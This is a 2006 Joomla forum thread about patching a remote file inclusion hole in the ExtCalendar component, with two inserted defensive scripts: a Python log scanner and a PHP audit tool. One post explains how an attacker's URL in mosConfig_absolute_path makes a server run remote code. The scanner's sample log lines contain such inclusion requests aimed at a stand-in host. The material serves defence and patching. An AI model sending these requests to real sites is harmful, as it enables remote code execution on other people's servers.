[UPGRADE AVAIL.] ExtCalendar Vulnerability

For all Non-Joomla! security issues. ie 3pd Components etc.

Moderator: General Support Moderators

Wil
Joomla! Intern
Posts: 67
Joined: Thu Aug 18, 2005 1:47 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Wil » Sun Jul 23, 2006 8:22 am

Elpie wrote:
ssherlock wrote:
Slack wrote: Latest Events still needs to be fixed.

dpk, thanks for the "comment out" solution - dunno what effect it has, but at least the mini-calendar is running.
Would this be as simple as adding the following?
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
to the php files?
No. Adding that line would make it safer, but it would still be vulnerable.
Any chance that it will be fixed on short term?  :-[

exian
Joomla! Fledgling
Posts: 1
Joined: Sat Nov 05, 2005 4:20 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by exian » Sun Jul 23, 2006 9:40 pm

Rather than adding the _VALID_MOS check at the top of *EVERY* file, you could turn off the PHP setting register_globals. If you don't have access to the web host's php.ini, you may also be able to edit (if it exists) or create a file called .htaccess in Joomla's folder with the following contents:

php_value register_globals "0"

Note that this only works with Apache. ExtCalendar is not the only component affected. The phpBB2 bridge (com_forum) that I was using is also affected. I wouldn't be surprised if more crop up. I think the best solution is turning off register_globals.

If the component has a config file you could also add the following to it (assuming it's PHP):

// Stop if the path variable holds a URL (http://, ftp://, ...) instead of a local path
if (strpos($mosConfig_absolute_path, '://') !== false) {
  echo("Hack attempt detected!");
  exit;
}

This relies on the component including its config file before anything else. Most do.

The exploit takes advantage of register_globals and allow_url_fopen being on, then goes to a page with: http://your.site.com/joomla/components/ ... er.com/xyz

Then any file that has include($mosConfig_absolute_path ."/some/file.php"); now includes the remote file in its code. The attacker just creates a file called /some/file.php on their server and they can run anything they want right on your web server. I'm just saying a global solution is best.

---------------------
-- Ian
http://www.extrosoft.com
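
One way to spot the request pattern described in the post above in web server logs, as an added example that is not part of the original thread: the Python script below flags query strings in which the client tries to set a mosConfig_* variable. The log lines, host names and the com_example path are constructed, and matching the whole mosConfig_ prefix rather than only mosConfig_absolute_path is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme: http://, https://, ftp://, php://, ...
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)
# Configuration variables the CMS sets itself; a client has no reason to send them.
# The thread names only mosConfig_absolute_path; the prefix match is an assumption.
PROTECTED_PREFIX = "mosconfig_"

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Jul/2006:21:40:01 +0000] "GET /joomla/index.php?option=com_extcalendar&Itemid=5 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Jul/2006:21:41:13 +0000] "GET /joomla/components/com_example/lib.php?mosConfig_absolute_path=http://remote.example/xyz? HTTP/1.0" 200 312
198.51.100.7 - - [23/Jul/2006:21:41:15 +0000] "GET /joomla/components/com_example/lib.php?mosConfig_absolute_path=ftp%3A%2F%2Fremote.example%2Fxyz HTTP/1.0" 200 0
203.0.113.4 - - [23/Jul/2006:21:45:00 +0000] "GET /joomla/index.php?mosConfig_live_site=1 HTTP/1.1" 200 5120
192.0.2.11 - - [23/Jul/2006:21:46:00 +0000] "GET /joomla/index.php?option=com_weblinks&url=http://example.org/ HTTP/1.1" 200 900
"""


def classify_target(target):
    """Return [(param, decoded_value, severity)] for one request target."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        base = name.split("[", 1)[0].lower()   # treat name[] / name[k] like name
        if not base.startswith(PROTECTED_PREFIX):
            continue                           # ordinary parameter, even if it holds a URL
        decoded = unquote(value)               # second pass catches double encoding
        severity = "high" if SCHEME_RE.match(decoded) else "medium"
        findings.append((name, decoded, severity))
    return findings


def scan_access_log(lines):
    """Return one alert dict per suspicious parameter found in the log lines."""
    alerts = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value, severity in classify_target(m.group("target")):
            alerts.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],
                "param": name,
                "value": value,
                "severity": severity,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG.splitlines()):
        print("{severity:6} line {line} {client} {param}={value}".format(**alert))
```

Access logs record only the query string; register_globals also imports POST and cookie variables, so those requests need other telemetry.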

SKv
Joomla! Apprentice
Posts: 35
Joined: Tue Sep 20, 2005 5:28 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by SKv » Mon Jul 24, 2006 10:07 am

Wil wrote: Any chance that it will be fixed on short term?  :-[
I am working on it. It's not that I am crazy about it but I have to do it.  ??? :'( :o :(

Any help will be appreciated.
Signature rules: Literal URLs only - http://forum.joomla.org/viewtopic.php?f=8&t=65

emma
Joomla! Apprentice
Posts: 6
Joined: Mon Jul 17, 2006 11:30 am

Re: Rotating Banner Space

Post by emma » Mon Jul 24, 2006 2:27 pm

Hi Everyone,

I need some software for a top banner, and 5 on the left hand side of the site and seven boxes on the left.....

I would like them to all be rotating.

Can anyone suggest which software I should use? ???

Thanks,
Rgds, Emma

sc00zy
Joomla! Exemplar
Posts: 9532
Joined: Thu Aug 18, 2005 9:07 am
Location: Assen, Netherlands

Re: Rotating Banner Space

Post by sc00zy » Mon Jul 24, 2006 3:07 pm

emma wrote: Hi Everyone,

I need some software for a top banner, and 5 on the left hand side of the site and seven boxes on the left.....

I would like them to all be rotating.

Can anyone suggest which software I should use? ???

Thanks,
Rgds, Emma
Hi Emma,

This topic is about ExtCalendar.

Make a new topic for your question please.
Arjan Menger
https://welldotcom.nl - Puntgaaf Internetbureau

koltz
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 4:46 pm

Noticed a bug and didn't see it posted in this thread.  When viewing the calendar in Monthly View, and there is more than one event scheduled for that day, only one will be displayed multiple times, but if I click on daily view, it will then display fine.

This isn't just on my test site, but noticed it up on Riverwest Neighborhood's site:

http://www.riverwestneighborhood.org/co ... e,cal/lang,/

Corey

Elpie
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Mon Jul 24, 2006 5:52 pm

This patch was given some time ago to fix that (note, I haven't tried it so use at your own risk)

Line 79:

$database->setQuery("SELECT MAX(id) FROM #__menu WHERE link LIKE '%index.php?option=com_extcalendar%' AND published <> '-2'");

Change to:

$database->setQuery("SELECT id FROM #__components WHERE link LIKE '%option=com_extcalendar%'");
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info

koltz
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 6:23 pm

Thanks for the code.  What file?  Should be integrated (and checked) with the new version of this also since it is a bug.

Corey

Elpie
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Mon Jul 24, 2006 6:28 pm

Oops! Sorry, this is in mod_extcalendar_latest.php

koltz
Joomla! Intern
Posts: 66
Joined: Mon Nov 07, 2005 4:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by koltz » Mon Jul 24, 2006 6:38 pm

Same thing :(

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:06 am

koltz wrote: Noticed a bug and didn't see it posted in this thread.  When viewing the calendar in Monthly View, and there is more than one event scheduled for that day, only one will be displayed multiple times, but if I click on daily view, it will then display fine.

This isn't just on my test site, but noticed it up on Riverwest Neighborhood's site:
http://www.riverwestneighborhood.org/co ... e,cal/lang,/
Corey
1. This does not need to be a bug. It could be setting related.
2. Please post this in 3rd party component board as a new thread because I think we should keep this thread to the ExtCalendar Vulnerability issue?

cheers
Leo
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:38 am

Elpie wrote: Oops! Sorry, this is in mod_extcalendar_latest.php
Lynne,
I have sent David the files I am talking about.... The mod_extcalendar_latest.php does have the direct access protection but is still open (we think),
but the second one in the package is extcal_latest_func.php, which lacks any protection and is as open as the ozone layer above "Down-Under" and "Kiwi-Islands"  ;) So let's see what Master-Dave comes up with  :-\

Take care (both of you :) )

Cheers
Leo
Last edited by leolam on Tue Jul 25, 2006 3:42 am, edited 1 time in total.

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Tue Jul 25, 2006 3:48 am

Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.

david

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 3:50 am

davidrrm wrote: Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.

david
dave,
according to some people who "claim" to be specialists you might access the rest by utilizing this particular file......your opinion?
cheers
Leo

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Tue Jul 25, 2006 4:15 am

Maybe it's because I'm up past my bedtime :-), but I don't see a way to get any code to run in that file. If someone accessed it directly, the file would be parsed but the only code in it is inside functions. There's no way to call those functions, so nothing would happen.

If the specialists have some more details about how an exploit might take advantage of it, I'd be interested in hearing it. As I mentioned, I think it's poor practice, but there doesn't appear to be a threat there.

david

deleted user

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by deleted user » Tue Jul 25, 2006 4:38 am

Elpie wrote: Oops! Sorry, this is in mod_extcalendar_latest.php
That can't be the correct file--it has nothing to do with the monthly displays. Plus, I don't even have this mod.

Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?

I'm going to check out Events beta 1.3

Elpie
Joomla! Guru
Posts: 903
Joined: Wed Aug 17, 2005 11:26 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Elpie » Tue Jul 25, 2006 8:24 am

dpk wrote: Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?
Not you anyway  :laugh: A lot of people are using it and were upset to find it was vulnerable.  David *is* going to work on it but you need to remember that ExtCalendar was abandonware and nothing had been done with it for the best part of a year. We didn't set out to fix the bugs or add features. The fact that some bugs were fixed in the security update was really incidental.  Heck, the three who worked on this (with David doing most of it) don't even use ExtCalendar on our sites!! LOL

Ottobufonto
Joomla! Enthusiast
Posts: 118
Joined: Tue Sep 06, 2005 10:53 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Ottobufonto » Tue Jul 25, 2006 9:47 am

davidrrm wrote: Yep, extcal_latest_func.php is missing the defined("_VALID_MOS") or die line, but it's saved by having only functions in it, so if it were accessed directly no code would run. I think every file should have that direct access check, just to make it easier for us to audit components, so it should be added when the module is updated. I also dislike that the file is included in mod_extcalendar_latest.php prior to the defined("_VALID_MOS") line. Again, this does not appear to be a security problem now, but the code might be changed later in a way that would cause a problem.

Thanks for pointing this out. That file's hidden pretty well there.
Well, back then there weren't many open discussions about component security and it was a patch never really made to go public
dpk wrote: Time for a Reality Check: extCal is pretty but buggy and lacking in some major features that would make it really useful. Security fixes for it are nice, but who wants a secure, feature poor, buggy component?

I'm going to check out Events beta 1.3
...

Reality check for who? Most people here use Extcal cause it has features they want - not cause there is no alternative. We all know that this project is not David's original work, nor was it Scott and other David, nor Matt Friedman who made the first mambo component.

Everybody that doesn't think Extcal meets their needs - please go and use something else! But please go quietly; otherwise stop complaining and start helping to improve the component.

People that were interested know that this version isn't even based on the last beta of Extcal (which is already over a year old).
The Author is still working on it (very slowly though) and will hopefully publish a new beta some time soon.

Extcal has been abandonware on the Joomla/Mambo side for a long time. Maybe there are some good people ganging up as we speak to change that. IMHO the only way forward for a Joomla component is to get in contact with the original author and work off the latest code base and J10e (Joomla!ise) it.

Edit: Apologies for OT post and polluting the thread.

Otto
Last edited by Ottobufonto on Tue Jul 25, 2006 10:16 am, edited 1 time in total.

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Tue Jul 25, 2006 10:04 am

All users do yourself a favor.....?

Please read back what has been said and do not pollute this thread....
Once again here is the situation.........Many big vulnerabilities were discovered and many people have worked very hard to create a solution for thousands of very satisfied users of this calendar. Also go back a couple of posts where Elpie stated that something good might come out of this..so now just be unbelievably grateful to all these people guided by Elpie and David amongst many others who have tested the solutions as released (as I recall we had 3 or 4 over the past week) which at the end resulted in a working calendar again. Now whether that thing is buggy or not is not relevant at this stage.....It is the easiest calendar around and many people have been using it with lots of pleasure, as have many of our customers.

So let's just wait and see what is coming out of it for beauty?

cheers  :)
Leo

Nightmunky
Joomla! Apprentice
Posts: 20
Joined: Wed Feb 08, 2006 3:10 am

Re: ExtCalendar

Post by Nightmunky » Tue Jul 25, 2006 3:32 pm

mom2nine wrote:
I saw a calendar component today called Thyme that appears to be ported for Joomla.  Anyone have experience with it?  I'm running news and information sites, we HAVE to have an events calendar.  Never dreamed something like this would happen, especially since I'd upgraded to 1.10 in Joomla.  Just goes to show, it can happen anytime, anywhere.
There's a 'Thyme' topic here: http://forum.joomla.org/index.php/topic,54772.0.html

:)

technopuzzle
Joomla! Ace
Posts: 1958
Joined: Thu Aug 18, 2005 5:53 pm
Location: Washington D.C. & Baltimore, MD Metro

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by technopuzzle » Thu Jul 27, 2006 2:50 am

Is there any timeline on if/when you most gracious and generous developers will "fix" the issues with the latest events module?

No pressure from me, but my wife is really pitching a fit since I unpublished it / renamed it / disabled it on our site.

Thanks again for all the hard work and bringing this great calendar component back from the dead.
Thanks,
Roger Raymond
Techno Puzzle

deleted user

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by deleted user » Fri Jul 28, 2006 6:07 am

Some people here are looking for solutions with an eye on the big picture: functional software.

Unfortunately, I have determined that ExtCal really is the best open source calendar that is available. There is no good alternative.

Yes it's great we have more secure version of ExtCal, but it remains a bug-laden, albeit pretty, POS. Denial doesn't make it better. Bugs are always relevant. Perhaps many people have enjoyed a buggy ExtCal, but I do not enjoy having mostly recurring events that ExtCal cannot handle, or multiple events per day, which will not display properly on the monthly view.

FYI, here is how to fix that last bug, which ought to be incorporated (with others mentioned earlier) into the latest file release:
http://forum.joomla.org/index.php?PHPSE ... 680.0.html
http://forum.joomla.org/index.php?topic=39582.msg321766

For the benefit of others who find or follow this thread looking for a good calendar system:

Events 1.3 is only marginally better than ExtCal. Its recurrent event options are badly organized, incomplete, and described in bad English that adds to the confusion. The author also appears not to have much familiarity with the mathematical peculiarities of the Gregorian calendar. Events List looks like the big winner with all kinds of extras, except it is more suited for club/entertainment notices and is now exclusively for Joomla. Thyme really appears to be the only quality calendar option; unfortunately it is a standalone commercial piece of software.

In the interest of being even more constructive, let me suggest that anyone developing ExtCal or any event calendar software first familiarize themselves with quality models: Thyme, Events List, and the simple and effective recurrent event concept in the interface for Microsoft Outlook.
Last edited by deleted user on Fri Jul 28, 2006 6:46 am, edited 1 time in total.

Da3dalus
Joomla! Apprentice
Posts: 17
Joined: Wed Nov 09, 2005 8:36 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by Da3dalus » Fri Jul 28, 2006 7:41 am

So what about ExtCal latest events module after all? We're waiting for its security version passionately! :-*

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 9:53 am

My apologies, I thought this was posted already.

There is no known security issue with Ext calendar latest module. Yes, one file is missing the defined('_VALID_MOS') or die.. line, but that file consists entirely of functions so it has no code that will execute if called directly. Two of us have reviewed the code and while it may have other problems, a known security vulnerability is not one of them.

A version is being worked to improve it and we'll add that line to the file of functions just to make us all feel better, but in the meantime the previous release is fine (and I'll get it posted in the new project on the Forge when I get a spare minute).

If anyone has knowledge of a security vulnerability, please PM me with the details and we'll investigate.

david

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Fri Jul 28, 2006 10:05 am

davidrrm wrote: My apologies, I thought this was posted already.
If anyone has knowledge of a security vulnerability, please PM me with the details and we'll investigate.
david
David,
The reason for me raising the alarm a couple of pages ago in this thread was the fact that the main file latest_extcalendar.php or so whatever the name is was NOT having the ('_VALID_MOS') or die.. line incorporated on two of our client sites! I do concur that the functions in the other file do not pose a security threat itself after renewed consultations with the php-guys but as you stipulate the file could be hammered tied with some extras as you are working on..I do think it is a good idea to post the file-version of mod_extcalendar_latest.php  you have just here as an attachment  (not the module) for people to overwrite their current version just to be sure that they all have the latest "more-or-less-secure" version. Sounds like a plan?  ;)

cheers
Leo
Last edited by leolam on Fri Jul 28, 2006 10:16 am, edited 1 time in total.

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 11:58 am

In the two versions (numbered .5 and .7.2.5) I looked at the main file was fine. In .7.2.5 there's a function file that does not have the line, but is ok since it only has functions. If it increases everyone's feeling of security I'll update the function file and post it here. I'll do that in a few hours, I want to double check that it works with that change (I'm 99.999999% sure that it does, but I just want to be certain).

david

leolam
Joomla! Master
Posts: 20242
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by leolam » Fri Jul 28, 2006 1:30 pm

davidrrm wrote: In the two versions (numbered .5 and .7.2.5) I looked at the main file was fine. In .7.2.5 there's a function file that does not have the line, but is ok since it only has functions. If it increases everyone's feeling of security I'll update the function file and post it here. I'll do that in a few hours, I want to double check that it works with that change (I'm 99.999999% sure that it does, but I just want to be certain).
david
With all respect with all you have done for this community (I so applaud you!)....The function file you talk about is extcal_latest_func.php This is not where I talked about...I suggested (!) to publish here "mod_extcalendar_latest.php" to secure people's emotions....Nothing wrong to insert the ('_VALID_MOS') or die.. line into the other file: extcal_latest_func.php  so again with all respect where do you need to be sure about?  ;)

cheers
Leo

mwep
Joomla! Apprentice
Posts: 13
Joined: Wed Mar 01, 2006 9:05 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by mwep » Fri Jul 28, 2006 2:23 pm

Thanks for helping to resolve the vulnerabilities in ExtCal!

We are somewhat confused after reading the thread...

Is ExtCal Latest Events safe or should we remove it ?

Thanks!!!

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 2:49 pm

I think there may be three versions running around, two which I've seen and one which I haven't but leolam has. If you feel comfortable looking through PHP code, you're looking for the line that starts

defined('_VALID_MOS') or die(

This should be in the mod_extcalendar_latest.php file. If it's there - great - if it's not, you do have a vulnerability.

If you don't want to do that and want to be on the safe side, I'd suggest removing the mod_extcalendar_latest for now (you must remove it, just unpublishing it doesn't do anything).

We'll hopefully have the definitely secure module shortly (i.e. within a day or two).

david
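
The manual check described above can be run over a whole component or module directory. This is an added example in Python, not code from the ExtCalendar project: it reports PHP files with no _VALID_MOS line, files that include something before that line, and includes built from $mosConfig_absolute_path that no check precedes. The sample file contents are constructed, the finding names are made up for this example, and it assumes pure-PHP files with no inline HTML.

```python
import os
import re
import sys

# The direct-access check quoted in the thread, tolerant of quoting and spacing.
GUARD_RE = re.compile(
    r"""defined\s*\(\s*['"]_VALID_MOS['"]\s*\)\s*(?:or|\|\|)\s*die\b""", re.I)
INCLUDE_RE = re.compile(r"(?<![$\w])(?:include|require)(?:_once)?\b[^;]*;", re.I)
PATH_VAR = "$mosConfig_absolute_path"

SAMPLES = {  # constructed file contents, not taken from ExtCalendar
    "guarded.php": "<?php\ndefined('_VALID_MOS') or die('no');\n"
                   "require_once($mosConfig_absolute_path . '/some/file.php');\n",
    "include_first.php": "<?php\nrequire_once($mosConfig_absolute_path . '/f.php');\n"
                         "defined( '_VALID_MOS' ) or die( 'no' );\n",
    "funcs_only.php": "<?php\nfunction latest() { return 'http://example.org/'; }\n",
    "commented_out.php": "<?php\n// defined('_VALID_MOS') or die('no');\n"
                         "include($mosConfig_absolute_path .\"/some/file.php\");\n",
}

def strip_comments(src):
    """Drop PHP comments; keep quoted strings (so 'http://' survives) and newlines."""
    out, i, n = [], 0, len(src)
    while i < n:
        ch = src[i]
        if ch in "'\"":                      # copy a quoted string verbatim
            j = i + 1
            while j < n and src[j] != ch:
                j += 2 if src[j] == "\\" else 1
            out.append(src[i:j + 1])
            i = j + 1
        elif src.startswith("/*", i):        # block comment: keep its newlines
            end = src.find("*/", i + 2)
            end = n if end < 0 else end + 2
            out.append("\n" * src.count("\n", i, end))
            i = end
        elif src.startswith("//", i) or ch == "#":   # line comment
            end = src.find("\n", i)
            i = n if end < 0 else end
        else:
            out.append(ch)
            i += 1
    return "".join(out)

def audit_php_source(src):
    """Return [(finding, line)] for one file; line 0 means the whole file."""
    code = strip_comments(src)
    guard = GUARD_RE.search(code)
    findings = [] if guard else [("MISSING_GUARD", 0)]
    for m in INCLUDE_RE.finditer(code):
        line = code.count("\n", 0, m.start()) + 1
        unguarded = guard is None or m.start() < guard.start()
        if guard and unguarded:
            findings.append(("INCLUDE_BEFORE_GUARD", line))
        # With register_globals on and no check yet, a request can supply this variable.
        if unguarded and PATH_VAR in m.group(0):
            findings.append(("UNGUARDED_PATH_INCLUDE", line))
    return findings

def audit_tree(root):
    """Audit every .php file under root; returns {relative_path: findings}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    findings = audit_php_source(fh.read())
                if findings:
                    report[os.path.relpath(path, root)] = findings
    return report

if __name__ == "__main__":
    report = (audit_tree(sys.argv[1]) if len(sys.argv) > 1
              else {n: audit_php_source(s) for n, s in SAMPLES.items()})
    for name, findings in sorted(report.items()):
        for code, line in findings:
            print(f"{name}:{line}: {code}")
```

A MISSING_GUARD finding on a file that contains only function definitions is the audit-hygiene case discussed in the thread; UNGUARDED_PATH_INCLUDE is the one to look at first.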

davidrrm
Joomla! Explorer
Posts: 251
Joined: Mon Sep 05, 2005 3:50 pm

Re: [UPGRADE AVAIL.] ExtCalendar Vulnerability

Post by davidrrm » Fri Jul 28, 2006 6:53 pm

Thanks to Otto's work we have a new mod_extcalendar_latest that has the check for _VALID_MOS at the top of each file, and fixes a few bugs.

- fix for artf3004 / artf3555 - fix for non-registered users (not authorized to ...)
- fix for artf3455 - problem with stripping bb code from event description
- fix for artf4535 - shows all day events in advance

This is available on the new ExtCalendar project site on JoomlaForge - http://developer.joomla.org/sf/projects/extcalendar.

Many thanks to Otto for his work on this.

david

